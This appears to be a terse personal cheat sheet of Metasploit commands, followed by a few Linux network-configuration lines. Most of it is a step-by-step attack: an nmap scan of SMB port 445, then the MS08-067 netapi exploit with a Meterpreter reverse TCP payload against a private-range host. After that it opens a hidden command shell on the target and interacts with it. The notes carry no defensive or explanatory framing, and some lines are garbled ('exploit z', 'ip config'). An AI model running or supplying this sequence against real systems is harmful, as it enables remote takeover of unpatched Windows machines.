metaspliot config
for update: sudo svn update /opt/metasploit3/msf3/
nmap -PS -n -v -p 445 192.168.1.15
msfconsole
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set RHOST 192.168.1.15
set LHOST 192.168.1.10
show targets
set TARGET 3
exploit z
help
execute -c -f cmd -H
channel -l
interact 1
ip config eth0
ifconfig eth0 192.168.1.10
ifconfig eth0 192.168.1.10 netmask 255.255.255.0
route add default gw 192.168.1.1 eth0
echo nameserver 192.168.1.1 > /etc/resolv.conf
echo nameserver 4.2.2.4 >> /etc/resolv.conf
ifconfig eth0 up
ifconfig -a